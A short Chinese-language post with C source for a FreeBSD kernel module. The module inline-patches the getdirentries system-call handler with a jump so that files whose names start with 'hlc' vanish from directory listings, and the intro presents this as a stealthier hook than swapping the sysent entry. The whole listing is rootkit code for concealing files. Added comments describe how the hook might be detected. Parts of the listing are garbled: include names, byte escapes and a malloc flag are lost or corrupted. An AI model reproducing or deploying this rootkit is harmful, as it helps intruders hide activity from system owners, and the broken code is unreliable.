不直接替换系统调用的kld
如果在sysent表里面直接替换系统调用,很容易被发现,我们可以通过改写系统调用的 前面几个字节(jmp 新的系统调用)来达到更好的隐藏效果,而不是直接替换系统调用. 下面的代码就是具体的实现:
/*
 * Inline hook of the getdirentries(2) handler.
 *
 * Instead of swapping the sysent[].sy_call pointer, the first 7 bytes of the
 * existing handler are overwritten with "movl $imm32,%eax; jmp *%eax" (see
 * load() below). The sysent table itself is left unchanged, so an integrity
 * check that only compares sysent entries against expected values does not
 * observe the hook; the handler's code bytes have to be compared against the
 * kernel image (or a saved copy) to notice it.
 *
 * NOTE(review): this listing is reproduced as extracted from the page: the
 * header names after #include and the backslash escapes inside the
 * byte-string literals were lost, so it does not compile as shown. It is kept
 * verbatim here for analysis.
 */
#include            /* header name lost in extraction */
#include            /* header name lost in extraction */

/* malloc(9) type used for the temporary kernel copy of the directory buffer. */
MALLOC_DEFINE(HLC_DIR,"dir","struct");

/* Directory entries whose name starts with this prefix are dropped
 * (see filehide()). */
#define hidename "hlc"
#define hidelength 3

/*
 * 7-byte trampoline written over the start of the original handler.
 * Bytes 1..4 are filled in at MOD_LOAD with the address of
 * new_getdirentries (a 32-bit immediate, i.e. i386).
 */
unsigned char new_call_code[7]="xb8x00x00x00x00"   /* movl $new_getdirentries,%eax (escapes lost) */
                              "xffxe0";            /* jmp *%eax */
/* Saved copy of the original handler's first 7 bytes; restored on unload
 * and around every pass-through call in new_getdirentries(). */
unsigned char old_call_code[7];

/*
 * filehide - decide whether a directory entry should be dropped.
 *
 * Copies the first hidelength bytes of name into a local buffer, appears to
 * intend to terminate it, and compares the result with hidename; any entry
 * whose name begins with "hlc" therefore matches, not only an exact match.
 *
 * NOTE(review): the terminator assignment is garbled in this listing (a
 * string literal is assigned to a char element), and bcopy reads hidelength
 * bytes from name unconditionally, even when name is shorter than that.
 *
 * Returns 1 when the entry is to be hidden, 0 otherwise.
 */
static int filehide(char *name)
{
    char buf[hidelength+1];

    bcopy(name,buf,hidelength);
    buf[hidelength]=" ";
    if(!strcmp(buf,hidename))
        return 1;
    return 0;
}
/*
 * new_getdirentries - replacement handler reached through the trampoline.
 *
 * Temporarily restores the original code bytes, calls the real
 * getdirentries(), re-installs the trampoline, then post-processes the user
 * buffer: it is copied into a kernel allocation, entries for which filehide()
 * returns 1 are squeezed out by shifting the remainder down over them, the
 * returned byte count (p->p_retval[0]) is reduced accordingly, and the
 * compacted buffer is copied back.
 *
 * Detection-relevant properties visible in this function:
 *  - the hook is removed and re-applied around every call, so the handler's
 *    first bytes alternate between original and patched; a scanner that
 *    samples them once may miss the hook, and concurrent callers may see
 *    either version.
 *  - only the first `size` bytes are written back; whatever the real call
 *    left beyond that point in the user buffer stays as it was.
 *  - the results of MALLOC, copyin and copyout are not checked.
 *
 * NOTE(review): the malloc flag (M_NOWA99v) is garbled in this listing.
 *
 * Always returns 0.
 */
static int new_getdirentries(struct proc *p,register struct getdirentries_args *uap)
{
    int size,count;
    struct dirent *dir,*current;

    /* Put the original prologue back so the real handler can be invoked,
     * then re-patch it once the call returns. */
    bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));
    getdirentries(p,uap);
    bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));

    size=p->p_retval[0];   /* number of bytes the real call placed in uap->buf */
    if(size>0) {
        MALLOC(dir,struct dirent *,size,HLC_DIR,M_NOWA99v);
        copyin(uap->buf,dir,size);
        current=dir;
        count=size;
        while((count>0)&&(current->d_reclen!=0)) {
            count-=current->d_reclen;   /* bytes remaining after this entry */
            if(filehide(current->d_name)) {
                size-=current->d_reclen;
                if(count!=0) {
                    /* Shift the following entries down over this one (the
                     * regions overlap; bcopy is relied on to handle that).
                     * `current` is deliberately not advanced: a new entry
                     * now occupies this position. */
                    bcopy((char *)current+current->d_reclen,current,count);
                }
                continue;
            }
            if(count!=0)
                current=(struct dirent *)((char *)current+current->d_reclen);
        }
        p->p_retval[0]=size;
        copyout(dir,uap->buf,size);
        free(dir,HLC_DIR);
    }
    return 0;
}
/*
 * load - module event handler (MOD_LOAD / MOD_UNLOAD).
 *
 * MOD_LOAD: stores the address of new_getdirentries into bytes 1..4 of the
 * trampoline, saves the handler's first 7 bytes into old_call_code and then
 * overwrites them with the trampoline. MOD_UNLOAD: writes the saved bytes
 * back.
 *
 * Observable side effect: the "install ok" printf goes to the kernel
 * console / message buffer, where it remains visible after loading.
 *
 * NOTE(review): the store through (long *) assumes a 4-byte long (i386);
 * on an LP64 kernel it would write past the end of new_call_code. Writing
 * into sy_call also presumes the kernel text is writable.
 *
 * Returns 0 on success, EINVAL for any other event.
 */
static int load( module_t *mod,int cmd,void *arg)
{
    int error=0;

    switch(cmd) {
    case MOD_LOAD: {
        /* Fill in the immediate operand of the movl with the hook's address. */
        *(long*)&new_call_code[1]=(long)new_getdirentries;
        bcopy(sysent[SYS_getdirentries].sy_call,old_call_code, sizeof(old_call_code));
        bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));
        printf("install ok ");
        break;
    }
    case MOD_UNLOAD: {
        /* Restore the original prologue; the hook is gone after this. */
        bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));
        break;
    }
    default: {
        error=EINVAL;
        break;
    }
    }
    return error;
}
/* Module descriptor: name "addjmp", event handler load(), no private data. */
static moduledata_t addjmp_mod={ "addjmp", load, NULL };

/* Registers the module with the kernel; load() receives MOD_LOAD when the
 * kld is loaded and MOD_UNLOAD when it is removed. */
DECLARE_MODULE(addjmp,addjmp_mod,SI_SUB_DRIVERS,SI_ORDER_MIDDLE);
